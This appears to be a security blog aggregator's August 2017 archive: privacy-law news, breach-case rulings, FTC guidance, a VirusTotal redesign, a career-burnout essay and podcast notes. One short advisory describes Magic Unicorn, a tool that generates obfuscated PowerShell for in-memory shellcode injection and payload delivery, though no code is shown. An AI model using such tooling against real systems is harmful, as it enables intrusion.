Monthly Archives: August 2017

Main Takeaways for CIOs from the Global C-Suite Study

Technological advances are transforming the way we connect, disrupting the status quo and creating huge turbulence. Industries are converging, and new opportunities and threats are emerging, as never before.

The pace of change is top of mind for CIOs. We live in an age where technology is nearly obsolete by the time it has been implemented and deployed. Gone are the days of 5-year and 7-year technology deployment plans; instead, CIOs must oversee a near-continuous digital transformation of their enterprise. Add to that the critical nature of today’s technology infrastructure (can your business run without computers, networks or the Internet?) and you get a good sense of the level of stress CIOs are facing today.

In 2016, IBM’s Institute for Business Value (IBV) sought to explore the CIO’s perspective as part of a wider study focusing on the C-Suite. For the CIO angle, the IBV study interviewed 1,805 CIOs from around the world, seeking to answer what the CIOs at the most successful enterprises do differently from their peers. It found a small but distinctive group, representing about 4% of CIOs. Compared to the rest of the pack, this small group, termed the Torchbearers, stood out for “creating intelligent, agile cultures; wising up to the needs of customers; and rewiring the way their organizations reason.” At the other extreme stood a large chunk of respondents (35%), termed Market-Followers, who kept a lower market profile and came from less financially successful organizations.

When it comes to the factors that worry CIOs, 77% are worried about “the disruptive influence of new technologies” and the inability to see the next competitor in time to react, a concern echoed by the rest of the C-Suite. Which new technologies did CIOs expect to have the most impact? They pointed to mobile solutions (71%), cloud computing (66%) and the Internet of Things (61%).

The Torchbearer Secret to Success?

No business can remain relevant by making ‘tweaks.’ The only way to stay ahead of disruptive change is to embrace it, which means being able to develop and release new products and services within weeks or even days.

IBM IBV 2016 Global C-suite Study, “The CIO Point of View”

CIOs know that to thrive, or just survive, in an era of converging industries, global competition and high-speed innovation, they need to move toward technology investments that give their organizations insight and foresight, rather than a rear-view-mirror picture of progress and capabilities. Seventy-one percent of Torchbearer CIOs consider the “strategic implications of new technologies,” looking not only to save costs but also to add to the bottom line by stimulating innovation. These CIOs also know that a traditional implementation model won’t cut it, which is why 90% of Torchbearer CIOs support agile innovation, compared to just 36% of Market-Follower CIOs.

CIOs today know they must continue to watch operating costs — in many cases do more with less — yet also provide great service quality, minimal downtime, increased agility, while also ensuring the security of the organization’s data. These are tall orders, and CIOs know that they do not have the in-house capability to deliver all these traits simultaneously.

Torchbearer CIOs are more likely to form partnerships to reap the full benefits of technological improvements. They realize the benefits of collaborating with others, leveraging partners’ systems and capabilities not only to provide the level and range of services the organization needs to compete today, but also to remain competitive tomorrow. Yet all these systems and data are likely to run on different operating platforms, and thus need to be integrated.

Takeaways for CIOs

But in order to provide this agility, CIOs need to rethink how they plan for and use technology to meet the ever-changing needs of the organization. Unless they have the luxury of time and the ability to manually integrate disparate systems, CIOs need help to improve the way they plan and manage the strategy around the automation and integration of IT infrastructure. This is where partnering with world-class enterprise service providers comes in. For example, in May 2017, the Everest Group named IBM as the Leader in IT Infrastructure Automation. They also pointed to IBM’s recent successes in leveraging cognitive computing to improve the way IT services are planned for, implemented, and delivered.

The most successful CIOs fully appreciate the need to forge alliances with the rest of the C-Suite, and they never lose focus on the value they bring to all aspects of the business: running IT as critical business infrastructure, maintaining a watchful eye over data, and investing in tools and technologies that will extract business intelligence from the mountains of data. When it comes to competing and thriving in the global marketplace, Torchbearer CIOs keep a strong focus on continuous technology improvement, not only to drive efficiencies (e.g., savings achieved by leveraging cloud solutions) but also to provide insight and foresight, which requires leveraging technologies like cloud computing and cognitive computing (e.g., IBM Watson).
Like the rest of the C-Suite, CIOs know the pressure to provide better analytics. Such analytics aren’t limited to sales and marketing trends and results; even IT can benefit from better insight into how current technology is or isn’t enabling the business to be more competitive. The question is, how are CIOs going to implement this agility, this capability to continuously adapt to change, and drive better performance and (technology) investment decisions? CIOs should look for an integration and automation partner that supports multiple platforms and ecosystems, supports automation, and can provide the analytics needed to monitor service levels and drive improvements.
This post was brought to you by IBM Global Technology Services. For more content like this, visit ITBizAdvisor.com

Enterprise Security Weekly #59 – Protect the Data

Michael and Matt join Paul to discuss security operations, endpoint protection, enterprise network monitoring, and the latest enterprise security news on this episode of Enterprise Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/ES_Episode59

Visit https://www.securityweekly.com for all the latest episodes!

IoT privacy: 30 ways to build a security culture

Much work must still be done before the industrial and municipal Internet of Things (IoT) becomes widely adopted outside the circle of innovators. One field, privacy, is well understood by the public and private sectors in the context of the cloud, PCs and mobile, but is only in the early stages of adaptation for the IoT.

The sheer volume of data that will be collected, and the new, more granular architecture of the IoT, present new privacy concerns that will need to be resolved on a scale matching the platform's forecast growth.

A demonstration of this new aspect of privacy and compliance is the Privacy Guidelines for Internet of Things: Cheat Sheet, Technical Report (pdf) by Charith Perera, a researcher at Newcastle University in the U.K. The nine-page report details 30 points for implementing strong privacy protections.


VirusTotal gets a new hairdo

Being geeks in a world of executable disassemblies, shell scripts, memory dumps and other beautiful matrix-like interfaces, it is no secret that at VirusTotal we have never been great artists. That said, many of you may have noticed that we have taken some time to refresh our public web site. Design is a matter of taste, and so we acknowledge that while some will love it, others won't. However, we think all of our users will be excited about some technical improvements that come along with this refresh, and so we wanted to be sure to call those out.

First of all, we dived into this redesign exercise in order to take advantage of new front-end architecture concepts such as web components. By making use of Polymer, we intend to create basic building blocks that will allow us to operate in a more agile fashion going forward, hopefully making it easier to create new features that you may all enjoy.

Under the hood we have placed a front-end cache layer that allows us, under certain circumstances, to load file and URL reports as if the data was stored locally on your machine, instantaneously. For instance, if you take a look at reports that contain lists of files or URLs, e.g.
https://www.virustotal.com/#/domain/drive.google.com
you may click on several files in the Downloaded files section and notice that after the first template load, subsequent file reports load immediately; the file objects appearing in lists are now cached locally via your browser's local storage. As you dive into multiple threat reports you may also notice lighter transitions, thanks to the revamped site being mostly a single page application.

We have also acknowledged the fact that analysts and researchers like to see as much information as possible about a threat condensed into as little space as possible. This is why we have reduced unnecessary padding, removed merely decorative icons, compacted detections into two columns, etc. It is also the reason behind introducing file type icons, so that we can communicate as much detail as possible at a glance:


https://www.virustotal.com/#/file/072afa99675836085893631264a75e2cffd89af568138678aa92ae241bad3553/detection
https://www.virustotal.com/#/file/82d763c76918d161faaca7dd06fe28bd3ececfdb93eced12d855448c1834a149/detection
We would like to thank our friends over at Freepik and Flaticon for designing such a rich set of icons for us.

Ease of data communication and comprehension also explains why certain new sections grouping details of the same nature have appeared, e.g. the file history section:


This section ties together all the date related information that we have about a file, including submission dates to VirusTotal, date metadata shared by partners such as Sysinternals' tool suite, file signature dates, modification date metadata contained in certain file formats such as ZIP bundles, etc. Many of these details were formerly spread over different sections that made it difficult to get a clear picture of a file under study.

We have also taken a shot at some usability improvements. You will notice that we now have an omnibar that allows you to search or submit files from any page within VirusTotal; whether you are on a file, domain, IP address or URL report, you can use the top bar to continue your investigations. Similarly, you can always drag and drop a file onto any view in order to trigger a file scan. By the way, we now accept files up to 256MB in size, leaving behind the former 128MB limitation.

Usability is also the reason why file and URL reports now include a floating action button that allows users with privileged accounts to act on the file in VirusTotal Intelligence, for example by launching a similar-file search in order to pinpoint other variants of interest.


Finally, we also wanted to spend some time making sure that certain technical features can be understood by non-technical audiences. This is why, when you hover over the headings or subheadings of the different detail sections, you now get descriptive tooltips:



Better descriptions and inline testing forms can also be found in our new API documentation and help center.
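If you want to poke at the API yourself, here is a minimal sketch of pulling a file report through the public v2 API (the third-party requests package is assumed; the API key is a placeholder, and the hash is one of the samples linked above):

    # Minimal sketch: fetch a VirusTotal file report via the public v2 API.
    import requests

    API_KEY = "your-api-key"  # placeholder; free keys come with a VirusTotal account
    params = {
        "apikey": API_KEY,
        "resource": "072afa99675836085893631264a75e2cffd89af568138678aa92ae241bad3553",
    }
    resp = requests.get("https://www.virustotal.com/vtapi/v2/file/report", params=params)
    report = resp.json()
    print(report.get("positives"), "of", report.get("total"), "engines flagged this file")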

As you can see, what looked like a merely subtle aesthetic change hides functionality improvements that we hope will make your research smoother. We feel very excited about the transition to web components, as this will allow us to reuse basic building blocks and will speed up future coding efforts. There is still a lot of work to do, as we have not fully rewritten the entire site: group and consumption sites, and private views such as Intelligence, are now entering our redesign kitchen. As usual, we would love to read your suggestions and ideas so that new iterations match your expectations; please share your feedback.

P.S. You may have noticed that our logo has morphed from a sigma into a sigma-flag symbiosis; there is a nice little story to it. The sigma represented the aggregation of detection technologies, and in the security field we often use the term "flag" for marking a file as suspicious; hence, the new logo represents both aggregation and flagging in one unique visual component.

China Releases Draft Guidelines on De-Identification of Personal Information

Recently, the National Information Security Standardization Technical Committee of China published a draft document entitled Information Security Technology – Guidelines for De-Identifying Personal Information (the “Draft Guidelines”). The Draft Guidelines are open for comment from the general public until October 9, 2017.

The Draft Guidelines provide a voluntary technical specification, the purpose of which is to provide guidance to data processors on the de-identification of personal information. The Draft Guidelines specify the purposes, principles and procedures for the de-identification of personal information. They also provide an introduction to common de-identification technologies, such as sampling, aggregation and cryptographic tools, and to common de-identification models, such as the K-anonymity model and the differential privacy model.
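To make one of those models concrete, here is a minimal sketch (my illustration, not part of the Draft Guidelines) of a K-anonymity check: a dataset is K-anonymous when every combination of quasi-identifier values is shared by at least K records.

    # Minimal K-anonymity check over a toy dataset (invented for illustration).
    from collections import Counter

    def is_k_anonymous(records, quasi_identifiers, k):
        # Count how many records share each quasi-identifier combination.
        groups = Counter(tuple(r[q] for q in quasi_identifiers) for r in records)
        return all(count >= k for count in groups.values())

    people = [
        {"zip": "100**", "age": "30-39", "diagnosis": "flu"},
        {"zip": "100**", "age": "30-39", "diagnosis": "cold"},
        {"zip": "200**", "age": "40-49", "diagnosis": "flu"},
    ]
    print(is_k_anonymous(people, ["zip", "age"], 2))  # False: the last group has only one record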

According to the Draft Guidelines, the de-identification of personal information should follow the following principles:

  • the de-identification must be in compliance with laws and regulations in relation to the protection of personal information;
  • the protection of personal information has priority over the use of the de-identified data;
  • measures should be adopted that reflect both technical and management approaches when conducting a de-identification of personal information;
  • software tools should be used; and
  • after the de-identification of personal information has been completed, regular reassessments should be adopted.

The Draft Guidelines also provide key steps for the de-identification of personal information, including isolating the identifiers using methods such as manual analysis, choosing models for the de-identification of personal information, verifying the security and usefulness of the data after its de-identification, and supervising the process of de-identification.

Record Breach Settlement in Anthem Class Action Receives Judge Approval

On August 25, 2017, U.S. District Judge Lucy Koh signed an order granting preliminary approval of the record class action settlement agreed to by Anthem Inc. this past June. The settlement arose out of a 2015 data breach that exposed the personal information of more than 78 million individuals, including names, dates of birth, Social Security numbers and health care ID numbers. The terms of the settlement include, among other things, the creation of a pool of funds to provide credit monitoring and reimbursement for out-of-pocket costs for customers, as well as up to $38 million in attorneys’ fees. Anthem will also be required to make certain changes to its data security systems and cybersecurity practices for at least three years.

In granting preliminary approval of the settlement agreement, the court stated that the terms of the settlement “fall within the range of possible approval as fair, reasonable, and adequate” and also preliminarily certified the settlement class. KCC, the settlement administrator designated by the parties, will provide notice of the proposed settlement to class members by October 30. After notice is completed, class members will have until December 29, 2017 to object to or opt out of the settlement. The final approval hearing will be held on February 1, 2018.

Hack Naked News #138 – August 29, 2017

Sparring government agencies, Microsoft patches a patch of a patch, Intel chips and backdoors, SMS authentication begone, and more. Jason Wood of Paladin Security discusses scaling back data demand on this episode of Hack Naked News!

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode138

Visit https://www.securityweekly.com for all the latest episodes!

New Data Processing Notice Requirements Take Effect in Russia

As reported in BNA Privacy Law Watch, on August 22, 2017, the Russian privacy regulator, Roskomnadzor, announced that it had issued an order (the “Order”), effective immediately, revising notice protocols for companies that process personal data in Russia. Roskomnadzor stated that an earlier version of certain requirements for companies to notify the regulator of personal data processing was invalidated by the Russian Telecom Ministry in July.

The Order requires companies to notify Roskomnadzor in advance of personal data processing, including information on safeguards in place to prevent data breaches and whether the company intends to transfer data outside Russia (and, if so, the countries to which the data will be transferred). Companies must also confirm their compliance with Russia’s data localization law, which requires that companies processing personal data of Russian citizens store that data on servers located within Russia. In conjunction with the Order, Roskomnadzor released a new notification form that companies may use to communicate with the regulator.

Introducing Behavioral Information Security – The Falcon’s View

I recently had the privilege of attending BJ Fogg's Behavior Design Boot Camp. For those unfamiliar with Fogg's work, he started out doing research on Persuasive Technology back in the 90s, which has become the basis for most modern uses of technology to influence people (for example, the use of Facebook user data to influence the 2016 US Presidential Election). The focus of the boot camp was "behavior design," which was suggested to me by a friend who's a leading expert in modern, progressive security awareness program management.

Thinking about how best to apply this new-found knowledge, I've been mulling opportunities for application of Fogg models and methods. Suddenly, it occurred to me, "Hey, you know what we really need is a new sub-field that combines all aspects of security behavior design, such as security awareness, anti-phishing, social engineering, and even UEBA." I concluded that maybe this sub-field would be called something like "behavioral security" and started doing searches on the topic.

Well, lo and behold, it already exists! There is already a well-established sub-field within information security (infosec) known as "Behavioral Information Security." Most of the literature I've found (and there's a lot in academia) has popped up over the past 5 years or so. However, I did find a reference to "behavioral security" dating back to May 2004 (see "Behavioral network security: Is it right for your company?").

Going forward, I believe that organizations and standards should stop listing "security awareness" as a single line item requirement, and instead pivot to the expanding domain of "behavioral infosec." NIST CSF would be a great place to start (though I'm assuming it's too late for the v1.1 release, expected sometime soon). Nonetheless, I will be using this phrasing and description going forward.

The inevitable question you might have is, "How do you define the domain/sub-field of Behavioral Information Security?" To me, the answer is quite simple: any practice or capability that monitors or seeks to modify human behavior in order to reduce risk or improve security falls under behavioral infosec. These practice areas include everything from modern, progressive security education, training, and awareness programs (programs that go well beyond posters and blind anti-phishing, including developer education tied to appsec testing data) and progressive anti-phishing programs (that is, those that baseline and then measure impact), to all forms of social engineering (including red team testing, blue team testing, etc.) and user behavior monitoring through tools like UEBA (User and Entity Behavior Analytics).

Organizations should stand up Behavioral InfoSec Engineering programs and teams charged with these practice areas (certainly security awareness and the various testing, measuring, and reporting practices). Personnel should be suitably trained, not just in analytical areas but also in technical areas, in order to best develop technical content and practices designed to influence human behavior.

Lastly, why focus on human behavior? Because reports (like the Verizon DBIR) consistently show, year after year, that one wrong click by a human can break an entire security chain. Thus, we need to help people make better decisions. This notion is also very DevOps-friendly thinking. We should not want to see large security programs built and maintained within organizations; rather, we must work to thoroughly embed as many security practices and decisions as possible within non-security teams in order to improve security overall (something emphasized in DevSecOps programs). Security resources will never scale sufficiently on their own, which means we have to scale in other ways.

As an added bonus, to see the power of behavior design, I strongly recommend trying out BJ Fogg's "Tiny Habits" program, which is freely available here: http://tinyhabits.com/

cheers and good luck!

Confessions of an InfoSec Burnout – The Falcon’s View

Soul-crushing failure.

If asked, that is how I would describe the last 10 years of my career, since leaving AOL.

I made one mistake, one bad decision, and it's completely and thoroughly derailed my entire career. Worse, it's unclear if there's any path to recovery as failure piles on failure piles on failure.

The Ground I've Trod

To understand my current state of career decrepitude, as well as how I've seemingly become an industry pariah...

I have worked for 11 different organizations over the past 10 years. I left AOL in September 2007, right before a layoff (I should have waited for the layoff and gotten a package!). I had been there for more than 3.5 years and I was miserable. It was a misery of my own making in many ways. My team manager had moved up the ranks, leaving an opening. All my teammates encouraged me to throw my hat in the ring, but I demurred, telling myself I simply wasn't ready to manage. Oops. Instead, our new manager came through an internal process, and immediately made life un-fun. I left a couple months later.

When I left AOL, it was to take a regional leadership role in BT-INS (BT Global Services - they bought International Network Services to build-out their US tech consulting). A month into the role as security lead for the Mid-Atlantic, where I was billable on day 1, the managing director left and a re-org merged us in with a different region where there was already a security lead. 2 of 3 sales reps left and the remaining person was unable and unwilling to sell security. I sat on the bench for a long time, traveling as needed. An idle, bored Ben is a bad thing.

From BT I took a leadership role with this weird tech company in Phoenix. There was no budget and no staff, but I was promised great things. They let me start remote for a couple months before relocating. I knew it was a bad fit and not a good company before we made the move. I could feel it in my gut. But, I uprooted the family in the middle of the school year (my wife is an elementary teacher) and went to Phoenix, ignoring my gut. 6 months later they eliminated the position. The fact is that they'd hired a new General Counsel who also claimed a security background (he had a CISSP), and thus they made him the CISO. The year was 2009, the economy was in tatters after the real estate bubble had burst. We were stranded in a dead economy and had no place to go.

Thankfully, after a month of searching, someone threw me a life-line and I promptly started a consulting gig with Foreground Security. Well, that was a complete disaster and debacle. We moved back to Northern Virginia and my daughter immediately got sick and ended up in the hospital (she'd hardly had a sniffle before!). By the time she got out of the hospital I was sicker than I'd ever been before. The doctors had me on a couple different antibiotics and I could hardly get out of bed. This entire time the president of the company would call and scream at me every day. Literally, yelling at the top of his lungs over the phone. Hands-down the most unprofessional experience I'd had. The company partnership subsequently fell apart and I was kacked in the process. I remember it clearly to this day: I'm at my parents house in NW MN over the winter holidays and the phone rings. It's the company president, who starts out by telling me they'd finally had the kid they were expecting. And, they're letting me go. Yup, that's how the conversation went ("We had a baby. You're termed.").

Really, being out of Foreground was a relief given how awful it had been. Luckily they relocated us no strings attached, so I didn't owe anything. But, I once again was out of a job for the second time in 3 months. I'd had 3 employers in 2009 and ended the year unemployed.

In early 2010 I was able to land a contract gig, thinking I'd try a solo practice. It didn't work out. The client site was in Utah, but they didn't want to pay for a ton of travel, so I tried working remotely, but people refused to answer the phone or emails, meaning I couldn't do the work they wanted. The whole situation was a mess.

Finally, I connected with Peter Hesse at Gemini Security Solutions to do a contract-to-hire tryout. His firm was small, but had a nice contract with a large client that helped underpin his business. He brought me in to do a mix of consulting and biz dev, but after a year+ of trying to bring in new opportunities (and have them shot down internally for various reasons), I realized that I wasn't going to be able to make a difference there. Plus, being reminded almost daily that I was an expensive resource didn't help. I worked my butt off but in the end it was unappreciated, so I left for LockPath.

The co-founders of LockPath had found me when I was in Phoenix thanks to a paper I'd written on PCI for some random website. They came out to visit me and told me what they were up to. I kept in touch with them over the years, including through their launch of Keylight 1.0 on 10/10/10. I somewhat forced my way into a role with them, initially to build a pro svcs team, but that got scrapped almost immediately and I ended up more in a traveling role, presenting at conferences to help get the name out there, as well as doing customer training. After a year-and-a-half of doing this, they hired a full-time training coordinator who immediately threw me under the bus (it was a major wtf moment). They wanted to consolidate resources at HQ and moving to Kansas wasn't in the cards, so seeing the writing on the wall I started a job search. Things came to an end in mid-May while I was on the road for them. I remember it clearly, having dropped my then-3yo daughter with the in-laws the night before, I had just gotten into my hotel room in St. Paul, MN, ahead of Secure360 and the phone rang. I was told it was over, but he was going to think about it overnight. I asked "Am I still representing the company when I speak at the conference tomorrow?" and got no real answer, but was promised one first thing the next morning. That call never came, so I spoke to a full room the next morning and worked the booth all that day and the morning after that. I met my in-laws for lunch to pick-up my kiddo, and was sitting in the airport awaiting our flight home when the call finally came in delivering the final news. I was pretty burned-out at that time, so in many ways it was welcome news. Startup life can be crazy-intense, and I thankfully maintain a decent relationship with the co-founders today. But those days were highly stressful.

The good news was that I was already in-process with Gartner, and was able to close on the new gig a couple weeks later. Thus started what I thought would be one of my last jobs. Alas, I was wrong. As was much with my time there.

Before I go any further, an important observation bears noting: the onboarding experience is all-important. If you screw it up, it sets a horrible tone for the entire gig, and the likelihood of success drops significantly. If onboarding is professional and goes smoothly, people will feel valued and able to contribute. If it goes poorly, people will feel undervalued from the get-go and they will literally start from an emotional hole. Don't do this to people! I don't care if you're a startup or a Fortune 50 large multi-national. Take care of people from Day 1 and things will go well. Fail at it and you might as well stop and release them asap.

Ok, anyway... back to Gartner. It was a difficult beginning. I was assigned a mentor, per their process, but he was gone 6 of the first 9 weeks I was there. I was sent to official "onboarding training" the end of August (the week before Labor Day!) despite having been there for 2 months by that time. I was not prepped at all before going to onboarding, and as it turns out I should have been. Others showed up with documents to be edited and an understanding of the process. I showed up completely stressed out, not at all ready to do the work that was expected, and generally had a very difficult time. It was also the week before Labor Day, which at the time meant it was teacher workshops, and I was on the road for it with 2 young kids at home. Thankfully, the in-laws came and helped out, but suffice to say it was just really not good all-around.

I really enjoyed the manager I worked for initially, but all that changed in February 2014 when my former mentor, with whom I did not at all get along, became the team manager. The stress levels immediately spiked as the focus quickly shifted to strong negativity. I had been struggling to get paper topics approved and was fighting against the reality that the target audience for Gartner research is not the leading edge of thinking, but the middle of the market. It took me nearly a full year to finally get my feet under me and start producing at an appropriate pace. My 1 yr mark roughly corresponded with the mid-year review, which was highly negative. By the end of the year I finally found my stride and had a ton of research in the pipeline (most of which would publish in early 2015). Unfortunately, the team manager, Captain Negative, couldn't see that and gave me one of the worst performance reviews I've ever received. It was hands-down the most insulted I'd ever been by a manager. It seemed very clear from his disrespectful actions that I wasn't wanted there, and so I launched an intensive job search. Meanwhile, I published something like 4 papers in 6 weeks while also having 4 talks picked up for that year's Security & Risk Management Conference. All I heard from my manager was negativity despite all that progress and success. I felt like shit, a total failure. There were no internal opportunities, so outward I looked, eventually landing at K12.

Oh, what a disaster that place was. K12 is hands-down the most toxic environment I've ever seen (and I've seen a lot!). Literally, all 10 people with whom I'd interviewed had lied to me - egregiously! I'd heard rumblings of changes in the executive ranks, but the hiring manager assured me there was nothing that would affect me. A new CIO - my manager's boss - started the same day I did. Yup, nothing that would affect me. Ha. Additionally, it turns out that they already had a "security manager" of sorts working in-house. He wasn't part of the interview process for my "security architect" role. They said they were doing DevOps, but it was just a side pilot that wasn't getting anywhere. Etc. Etc. Etc. Suffice to say, it was really bad. I frankly wondered how they were still in business, especially in light of the constant stream of lawsuits emanating from the states where they had "online public schools." Oy...

Suffice to say, I started looking for work on Day 1 at K12. But there wasn't much out there, and recruiters were loath to talk to me given such a short stint. Explanations weren't accepted, and I was truly stuck. The longer I was there, the worse it looked. Finally, my old manager from AOL reached out as he was starting a CISO role at Ellucian. He rescued me, and in October 2015 I started with them in a security architect role.

There's not much I can say about my experience at Ellucian. Things seemed ok at first, but after a CIO change a few months in, plus a couple other personnel issues, things got wonky, and it became clear my presence was no longer desired. When your boss starts cancelling weekly 1-on-1 meetings with you, it becomes pretty clear that he doesn't really want you there. New Context reached out in May 2016 and offered me an opportunity to do research and publishing for them, so I jumped at it and got the heck out of dodge. It turns out, this was a HUGE mistake, too...

There's even less I can say about New Context... we'll just put it at this: Despite my best efforts, I was never able to get things published due to a lack of internal approvals. After a year of banging my head against the wall, my boss and I concluded it wasn't going to happen, and they let me go a couple weeks later.

From there, I launched my own solo practice and signed what was to be a 20-week contract with an LA-based client. They had been chasing me for several months to come help them out in a consulting (staff augmentation, really) capacity. I closed the deal with them and started on July 31st of this year. That first week was a mess, with them not being ready for me on day 1, then sending me a botched laptop build on day 2, and finally getting me online on day 3. I flew to LA to be on-site with them the following week and immediately locked horns with the other security architect. That first week on-site was horribly stressful. Things had finally started leveling off last week, and then yesterday (Monday 8/28/17) they called and cancelled the contract. While I'm disappointed, it's also a bit of a relief. It wasn't a good fit, it was a very difficult client experience, and overall I was actively looking for new opportunities while I did what I could for them.

Shared Culpability or Mea Culpa?

After all these years, I'm tired of taking the blame and being the seemingly constant punchline to some joke I don't get. I'm tired, I'm burned-out, I'm frustrated, I'm depressed, and more than anything I just don't understand why things have gone so completely wrong over the past 10 years. How could one poor decision result in so much career chaos and heartache? It's astonishing. And appalling. And depressing.

I certainly share responsibility in all of this. I tend to be a fairly high-strung person (less so over the years) and onboarding is always highly stressful for me. Increasingly, employers want you engaged and functional on Day 1, even though that is incredibly unrealistic. Onboarding must be budgeted for a minimum of 3-6 months. If a move is involved, then even longer! Yet nobody is willing to allow that any more. I don't know if it's mythology or downward pressure or what... but the expectations are completely unreasonable.

But I do have a responsibility here, and I've certainly not been Mr. Sunshine the past few years, which means I tend to come off as extremely negative and sarcastic, which can be off-putting to people. Attitude is something I need to focus on when starting, and I need to find ways to better manage all the stress that comes with commencing a new gig.

That said, I also seem to have a knack for picking the wrong jobs. This even precedes my time at AOL, which is really a shining anchor in the middle of a turbulent career. Coming into the workforce just before the DOT-COM bubble burst, I've been through lots of layoffs and turmoil. I simply have a really bad track record of making good employment choices. I'm not even sure how to go about fixing that, short of finding people to advise me on the process.

However, lastly, it's important for companies to realize that they're also failing employees. The onboarding process is immensely important. Treating people respectfully and mindfully from Day 1 is immensely important. Setting reasonable expectations is immensely important. If you do not actively work to set your personnel up for success, then it is extremely unlikely that they'll achieve it! And even in this day and age where companies really, truly don't value personnel (except for execs and directors), it must be acknowledged that there is a significant cost in lost productivity, efficiency, and effectiveness that can be directly tied to employee turnover. This includes making sure managers are reasonably well trained and are actually well-suited to being managers. You owe it to your employees to treat them as humans, not just replaceable cogs in a machine.

Where To Go From Here?

The pull of deep depression is ever stronger. Resistance becomes ever more difficult with each successive failure. I feel like I cannot buy a break. My career is completely off-track, and I decreasingly see a path to recovery. Every morning is a struggle to get up and look for work yet again. I feel like I've been doing this almost constantly for the past 10 years. I've not been settled anywhere since AOL (maybe BT).

I initially launched a solo practice, Falcon's View Consulting, to handle some contracts. And, that's still out there if I need it. However, what I really need is a full-time job. With a good, stable company. In a role with a good manager. A role that eventually has upward mobility (in order to get back on track).

Where that role is based I really do not care (my family might). Put me in a leadership role, pay me a reasonable salary, and relocate me to where you need me. At this point, I'm willing to go to bat and force the family to move, but you gotta make it easy and compelling. Putting me into financial hardship won't get it done. Putting me into a difficult position with no support won't get it done. Moving me and not being committed to keeping me onboard through the most stressful times won't get it done.

I'm quite seriously at the end of my rope. I feel like I have about one more chance left, after which it'll be bankruptcy and who knows what... I've given just about everything I can to this industry, and my reward has been getting destroyed in the process. This isn't sustainable, it isn't healthy, and it's altogether stupid.

I want to do good work. I want to find an employer that values me, one I can stay with for a reasonable period of time. I've never gone into any FTE role thinking "this is just a temporary stop while I find something better." I throw my whole self into my work, which is, I think, why it is so incredibly painful when rejection and failure finally happen. But I don't know another way to operate. Nor should anyone else, for that matter.

Two roads diverged in the woods / And I... I took the wrong one / And that has made all the difference

FTC Posts Sixth Blog in Its “Stick with Security” Series

On August 25, 2017, the FTC published the sixth blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled Stick with Security: Segment your network and monitor who’s trying to get in and out, illustrates the benefits of segmenting networks and monitoring the size and frequency of data transfers.

The practical guidance provides useful examples on how to:

  • Segment your Network: Companies today can link multiple devices together across a single network. While legitimate business reasons exist for such linkage, businesses should consider whether there is sensitive information on their networks requiring special treatment. Segmenting a network can include having separate areas of the network protected by firewalls that reject unnecessary traffic. This can reduce the impact of a breach, should one occur, by isolating it to a limited part of the system. For example, a company that maintains confidential client information can use a firewall to segment this part of its network from the portion of its network containing corporate website data.
  • Monitor Activity on your Network: Businesses should also monitor who is accessing, uploading or downloading information on the network, and respond quickly if abnormal activity is detected. Numerous tools are available to warn businesses about attempts to access their networks without authorization, as well as to spot malicious software installs and suspicious data exfiltration (a minimal sketch of this idea follows the list).
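To make the monitoring idea concrete, here is a minimal sketch (my illustration, not from the FTC guidance) that flags outbound transfers sitting far above a host's historical baseline:

    # Flag transfers that exceed the baseline mean by several standard deviations.
    from statistics import mean, stdev

    def flag_anomalies(history, new_transfers, sigma=3.0):
        mu, sd = mean(history), stdev(history)
        return [size for size in new_transfers if size > mu + sigma * sd]

    baseline = [120_000, 95_000, 110_000, 105_000, 130_000]  # bytes sent per day, invented
    print(flag_anomalies(baseline, [115_000, 2_500_000]))    # [2500000] stands out

Real systems would baseline per host, per protocol and per time of day, but the principle is the same.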

The guidance concludes by noting that the key lesson for businesses is to make things more difficult for hackers, which can be done by segmenting their networks and using readily accessible tools to monitor who is entering their systems and what is leaving.

The FTC’s next blog post, to be published on Friday, September 1, will focus on securing remote access to your network.

To read our previous posts documenting the series, see FTC Posts Fifth Blog in its “Stick with Security” Series, FTC Posts Fourth Blog in its “Stick with Security” Series, FTC Posts Third Blog in its “Stick with Security” Series and FTC Posts Second Blog in its “Stick with Security” Series.

Toolsmith Release Advisory: Magic Unicorn v2.8

David Kennedy and the TrustedSec crew have released Magic Unicorn v2.8.
Magic Unicorn is "a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory, based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by Dave and Josh Kelly at Defcon 18.

Version 2.8:
  • shortens length and obfuscation of unicorn command
  • removes direct -ec from PowerShell command
Usage:
"Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and Magic Unicorn will automatically generate a PowerShell command that you need to simply cut and paste the PowerShell code into a command line window or through a payload delivery system."


Heralding GSoC17 Report

The summer is coming to an end, and with it my happy GSoC17 days. Now it's time to sum up the results and say goodbye to GSoC until next year.

My impressions about working on the Heralding project

Working on the Heralding project was an awesome experience for me. I feel I did something helpful, fun and challenging at the same time. I couldn't have wished for a better summer!


Eighth Circuit Finds Article III Standing Yet Affirms Dismissal of Scottrade Breach Case

On August 21, 2017, the United States Court of Appeals for the Eighth Circuit affirmed the dismissal of a putative class action arising from the Scottrade data breach. Notably, however, the Eighth Circuit did not agree with the trial court’s ruling that the plaintiff lacked Article III standing, instead dismissing the case with prejudice for failure to state a claim. 

The plaintiff sued Scottrade after an internal database was breached in late 2013 and early 2014. The plaintiff’s putative class action asserted claims for breach of express and implied contracts, unjust enrichment, declaratory judgment and violation of the Missouri Merchandising Practices Act. He claimed damages based on, among other things, the increased risk of identity fraud, the costs of mitigating that risk and the decline in value of his personal identifying information (“PII”), as well as overpayment to Scottrade for brokerage services. The trial court dismissed the case due to lack of Article III standing. The Eighth Circuit disagreed with the standing ruling, but nevertheless affirmed on different grounds raised on Scottrade’s cross-appeal.

Article III Standing for Contract Claims. The appellate court found standing only for the breach of contract and contract-related claims based on allegations that the plaintiff did not receive the full benefit of his bargain. When the plaintiff opened his Scottrade account, he signed a Brokerage Agreement and provided Scottrade with certain PII. He claimed that a portion of the fees paid in connection with the Scottrade account were used to meet Scottrade’s contractual obligations to provide data management and security to protect his PII.

When Scottrade breached those data-security related obligations, the plaintiff argued that he received services of a lesser value, and the difference between the amount he paid and the value of the actual services rendered was an actual economic injury sufficient to establish constitutional standing. The court agreed that he had satisfied Article III standing for the contract and contract-related claims, but ultimately found the allegations were insufficient to state a claim.

